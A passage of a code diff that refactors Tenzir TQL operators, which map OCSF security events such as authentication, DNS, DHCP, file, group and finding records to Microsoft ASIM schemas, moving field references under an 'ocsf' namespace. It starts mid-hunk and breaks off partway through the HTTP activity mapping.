user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" - asim.TargetDomain = user.domain + asim.TargetDomain = ocsf.user.domain asim.TargetDomainType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.TargetSessionId = session?.uid? else session?.uid_alt? -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.SrcPortNumber = src_endpoint?.port? -asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? -asim.TargetAppId = service?.uid? else dst_endpoint?.uid? -asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? -asim.LogonProtocol = auth_protocol? -if auth_factors? != null { - asim.LogonMethod = auth_factors[0]?.factor_type? +asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.SrcPortNumber = ocsf.src_endpoint?.port? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? +asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? +asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? +asim.LogonProtocol = ocsf.auth_protocol? +if ocsf.auth_factors? != null { + asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 076665b..574f6d5 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "Authentication" asim.EventSchemaVersion = "0.1.4" asim.EventType = "Elevate" -match logon_type? { +match ocsf.logon_type? { "System" => { asim.EventSubType = "System" } "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { asim.EventSubType = "Interactive" @@ -20,36 +20,36 @@ match logon_type? { "OS Service" => { asim.EventSubType = "Service" } _ => {} } -if logon_type? != null { - asim.EventOriginalSubType = logon_type +if ocsf.logon_type? != null { + asim.EventOriginalSubType = ocsf.logon_type } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" - asim.TargetDomain = user.domain + asim.TargetDomain = ocsf.user.domain asim.TargetDomainType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.TargetSessionId = session?.uid? else session?.uid_alt? -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.SrcPortNumber = src_endpoint?.port? -asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? -asim.TargetAppId = service?.uid? else dst_endpoint?.uid? -asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? -asim.LogonProtocol = auth_protocol? -if auth_factors? != null { - asim.LogonMethod = auth_factors[0]?.factor_type? +asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.SrcPortNumber = ocsf.src_endpoint?.port? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? +asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? +asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? +asim.LogonProtocol = ocsf.auth_protocol? +if ocsf.auth_factors? != null { + asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 08331ac..d02093d 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -8,19 +8,19 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" -asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -asim.AlertName = finding_info?.title? else message? -asim.EventReportUrl = finding_info?.url? else null +asim.AlertName = ocsf.finding_info?.title? else ocsf.message? +asim.EventReportUrl = ocsf.finding_info?.url? else null asim.EventSubType = "Compliance Violation" -asim.ThreatName = malware?[0]?.name? else finding_info?.title? +asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? asim.ThreatCategory = "Security Policy Violation" -asim.ThreatOriginalCategory = finding_info?.types?[0]? -asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? -asim.UserId = user?.uid? else actor?.user?.uid? +asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? +asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? +asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null -match status? { +match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" } @@ -29,8 +29,8 @@ match status? { } _ => {} } -asim.AlertOriginalStatus = status? -match verdict? { +asim.AlertOriginalStatus = ocsf.status? +match ocsf.verdict? { "True Positive" => { asim.AlertVerdict = "True Positive" } "False Positive" => { asim.AlertVerdict = "False Positive" } "Benign" => { asim.AlertVerdict = "Benign Positive" } @@ -38,4 +38,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 96c313c..795ee08 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -23,19 +23,19 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" -asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -asim.AlertName = finding_info?.title? else message? -asim.EventReportUrl = finding_info?.url? else null +asim.AlertName = ocsf.finding_info?.title? else ocsf.message? +asim.EventReportUrl = ocsf.finding_info?.url? else null asim.EventSubType = "Threat" -asim.ThreatName = malware?[0]?.name? else finding_info?.title? -asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]? -asim.ThreatOriginalCategory = finding_info?.types?[0]? -asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? -asim.UserId = user?.uid? else actor?.user?.uid? +asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? +asim.ThreatCategory = $threat_categories[ocsf.finding_info?.types?[0]?.to_lower()]? +asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? +asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? +asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null -match status? { +match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" } @@ -44,8 +44,8 @@ match status? { } _ => {} } -asim.AlertOriginalStatus = status? -match verdict? { +asim.AlertOriginalStatus = ocsf.status? +match ocsf.verdict? { "True Positive" => { asim.AlertVerdict = "True Positive" } "False Positive" => { asim.AlertVerdict = "False Positive" } "Benign" => { asim.AlertVerdict = "Benign Positive" } @@ -53,4 +53,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 9306362..1d6b638 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -7,16 +7,16 @@ microsoft::asim::ocsf::helpers::common @name = "asim.dhcp_event" asim.EventSchema = "DhcpEvent" asim.EventSchemaVersion = "0.1.1" -match activity_name { +match ocsf.activity_name { "Ack" | "Offer" => { asim.EventType = "Assign" } "Request" => { asim.EventType = "Renew" } "Release" => { asim.EventType = "Release" } _ => { asim.EventType = "Assign" } } -asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string() -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcMacAddr = src_endpoint?.mac? +asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.string() +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcMacAddr = ocsf.src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 91555f0..8c71da7 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -7,20 +7,20 @@ microsoft::asim::ocsf::helpers::common @name = "asim.dns" asim.EventSchema = "Dns" asim.EventSchemaVersion = "0.1.7" -asim.EventType = query?.opcode? else "Query" -match activity_name { +asim.EventType = ocsf.query?.opcode? else "Query" +match ocsf.activity_name { "Query" => { asim.EventSubType = "request" } "Response" => { asim.EventSubType = "response" } _ => {} } -asim.DnsQuery = query?.hostname? -asim.DnsQueryTypeName = query?.type? -asim.DnsQueryClassName = query?.class? -asim.EventResultDetails = rcode? else "NA" -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.DstIpAddr = dst_endpoint?.ip? -asim.DstHostname = dst_endpoint?.hostname? -assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.DnsQuery = ocsf.query?.hostname? +asim.DnsQueryTypeName = ocsf.query?.type? +asim.DnsQueryClassName = ocsf.query?.class? +asim.EventResultDetails = ocsf.rcode? else "NA" +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.DstIpAddr = ocsf.dst_endpoint?.ip? +asim.DstHostname = ocsf.dst_endpoint?.hostname? +assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 05e4eb1..02cf88f 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } @@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Directory Service Object" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index d428ef1..d2b2c71 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } @@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Event Log" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index ac54b6c..15bb103 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -7,7 +7,7 @@ microsoft::asim::ocsf::helpers::common @name = "asim.file_event" asim.EventSchema = "FileEvent" asim.EventSchemaVersion = "0.2.2" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "FileCreated" } "Read" | "Open" => { asim.EventType = "FileAccessed" } "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } @@ -15,23 +15,23 @@ match activity_name { "Rename" => { asim.EventType = "FileRenamed" } _ => { asim.EventType = "FileCreatedOrModified" } } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? -asim.TargetFilePath = file?.path? else file?.name? -asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1] -if activity_name == "Rename" and file_result? != null { +asim.ActorUserId = ocsf.actor?.user?.uid? +asim.TargetFilePath = ocsf.file?.path? else ocsf.file?.name? +asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1] +if ocsf.activity_name == "Rename" and ocsf.file_result? != null { asim.SrcFilePath = asim.TargetFilePath asim.SrcFileName = asim.TargetFileName asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local" - asim.TargetFilePath = file_result.path? else asim.TargetFilePath - asim.TargetFileName = file_result.name? else asim.TargetFileName + asim.TargetFilePath = ocsf.file_result.path? else asim.TargetFilePath + asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName } asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" assert asim.ActorUsername != null and asim.TargetFilePath != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 69f3038..b978972 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -8,16 +8,16 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "UserManagement" asim.EventSchemaVersion = "0.1.2" asim.EventSeverity = asim.EventSeverity? else "Informational" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -asim.ActorUserId = actor?.user?.uid? +assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "GroupCreated" } "Delete" => { asim.EventType = "GroupDeleted" } "Add User" => { asim.EventType = "UserAddedToGroup" } @@ -26,17 +26,17 @@ match activity_name { _ => { asim.EventType = "GroupModified" } } -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.GroupName = group?.name? -asim.GroupId = group?.uid? +asim.GroupName = ocsf.group?.name? +asim.GroupId = ocsf.group?.uid? asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql index afc25d3..01cb285 100644 --- a/microsoft/operators/asim/ocsf/helpers/common.tql +++ b/microsoft/operators/asim/ocsf/helpers/common.tql @@ -2,29 +2,28 @@ description: Initializes shared ASIM fields from a validated OCSF event. --- -_ocsf = this -asim = {} +this = {ocsf: this, asim: {}} asim.EventCount = 1 -asim.EventStartTime = start_time? else time -asim.EventEndTime = end_time? else time -asim.EventProduct = metadata?.product?.name? else metadata?.product?.feature?.name? else "Unknown" -asim.EventVendor = metadata?.product?.vendor_name? else "Microsoft" +asim.EventStartTime = ocsf.start_time? else ocsf.time +asim.EventEndTime = ocsf.end_time? else ocsf.time +asim.EventProduct = ocsf.metadata?.product?.name? else ocsf.metadata?.product?.feature?.name? else "Unknown" +asim.EventVendor = ocsf.metadata?.product?.vendor_name? else "Microsoft" -if metadata?.original_event_uid? != null { - asim.EventOriginalUid = metadata.original_event_uid - asim.EventUid = metadata.original_event_uid +if ocsf.metadata?.original_event_uid? != null { + asim.EventOriginalUid = ocsf.metadata.original_event_uid + asim.EventUid = ocsf.metadata.original_event_uid } -if metadata?.event_code? != null { - asim.EventOriginalType = metadata.event_code +if ocsf.metadata?.event_code? != null { + asim.EventOriginalType = ocsf.metadata.event_code } else { - asim.EventOriginalType = type_uid.string() + asim.EventOriginalType = ocsf.type_uid.string() } -if message? != null { - asim.EventMessage = message +if ocsf.message? != null { + asim.EventMessage = ocsf.message } -match severity_id? { +match ocsf.severity_id? { 1 => { asim.EventSeverity = "Informational" } @@ -39,26 +38,26 @@ match severity_id? { } 5 => { asim.EventSeverity = "High" - asim.EventOriginalSeverity = severity? else "Critical" + asim.EventOriginalSeverity = ocsf.severity? else "Critical" } 6 => { asim.EventSeverity = "High" - asim.EventOriginalSeverity = severity? else "Fatal" + asim.EventOriginalSeverity = ocsf.severity? else "Fatal" } - _ if severity? == "Critical" or severity? == "Fatal" => { + _ if ocsf.severity? == "Critical" or ocsf.severity? == "Fatal" => { asim.EventSeverity = "High" - asim.EventOriginalSeverity = severity + asim.EventOriginalSeverity = ocsf.severity } - _ if severity? in ["Informational", "Low", "Medium", "High"] => { - asim.EventSeverity = severity + _ if ocsf.severity? in ["Informational", "Low", "Medium", "High"] => { + asim.EventSeverity = ocsf.severity } - _ if severity? != null => { - asim.EventOriginalSeverity = severity + _ if ocsf.severity? != null => { + asim.EventOriginalSeverity = ocsf.severity } _ => {} } -match status? { +match ocsf.status? { "Success" => { asim.EventResult = "Success" } @@ -69,8 +68,8 @@ match status? { asim.EventResult = "Partial" } _ => { - match status_id? { - 1 if class_uid != 2003 and class_uid != 2004 and class_uid != 2005 => { + match ocsf.status_id? { + 1 if ocsf.class_uid != 2003 and ocsf.class_uid != 2004 and ocsf.class_uid != 2005 => { asim.EventResult = "Success" } 2 => { @@ -82,34 +81,34 @@ match status? { } } } -if status_detail? != null { - asim.EventOriginalResultDetails = status_detail +if ocsf.status_detail? != null { + asim.EventOriginalResultDetails = ocsf.status_detail } -if status_code? != null { - asim.EventOriginalResultDetails = status_code.string() +if ocsf.status_code? != null { + asim.EventOriginalResultDetails = ocsf.status_code.string() } -if device?.hostname? != null { - asim.Dvc = device.hostname - asim.DvcHostname = device.hostname - asim.DvcFQDN = device.hostname +if ocsf.device?.hostname? != null { + asim.Dvc = ocsf.device.hostname + asim.DvcHostname = ocsf.device.hostname + asim.DvcFQDN = ocsf.device.hostname } -if device?.uid? != null { - asim.DvcId = device.uid +if ocsf.device?.uid? != null { + asim.DvcId = ocsf.device.uid } -if device?.ip? != null { - asim.DvcIpAddr = device.ip +if ocsf.device?.ip? != null { + asim.DvcIpAddr = ocsf.device.ip if asim.Dvc? == null { - asim.Dvc = device.ip.string() + asim.Dvc = ocsf.device.ip.string() } } if asim.Dvc? == null { asim.Dvc = asim.EventProduct } -if disposition? != null { - asim.DvcAction = disposition +if ocsf.disposition? != null { + asim.DvcAction = ocsf.disposition } -if action? != null { - asim.DvcAction = action +if ocsf.action? != null { + asim.DvcAction = ocsf.action } diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index cb366d7..8566279 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -8,12 +8,12 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "WebSession" asim.EventSchemaVersion = "0.2.7" asim.EventType = "HTTPsession" -asim.Url = http_request?.url?.url_string? -asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper() -asim.EventResultDetails = http_response?.code?.string() else status_code?.string() -if http_response?.code? != null { - asim.EventResult = "Success" if http_response.code < 400 else "Failure" +asim.Url = ocsf.http_request?.url?.url_string? +asim.HttpRequestMethod = ocsf.http_request?.http_method? else ocsf.activity_name?.to_upper() +asim.EventResultDetails = ocsf.http_response?.code?.string() else ocsf.status_code?.string() +if ocsf.http_response?.code? != null { + 